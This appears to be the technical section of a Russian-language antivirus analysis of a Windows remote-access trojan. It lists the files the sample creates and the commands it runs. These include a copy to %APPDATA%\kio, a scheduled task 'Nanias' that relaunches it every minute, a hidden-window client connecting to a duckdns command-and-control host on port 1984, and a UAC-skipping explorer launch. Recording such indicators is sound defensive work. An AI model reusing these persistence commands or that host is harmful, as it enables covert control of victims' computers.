Техническая информация
- <SYSTEM32>\tasks\createexplorershellunelevatedtask
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\<Имя файла>.exe.log
- %APPDATA%\kio\kio.exe
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Proxy Desktop' WindowName: ''
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
- '%WINDIR%\explorer.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' Client vncnew1984.duckdns.org 1984 ecZCILAfG (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c mkdir "%APPDATA%\kio"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 1 /tn "Nanias" /tr "'%APPDATA%\kio\kio.exe'" /f
- '%WINDIR%\syswow64\cmd.exe' /c copy "<Полный путь к файлу>" "%APPDATA%\kio\kio.exe"
- '%WINDIR%\explorer.exe' /NOUACCHECK
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 1 /tn "Nanias" /tr "'%APPDATA%\kio\kio.exe'" /f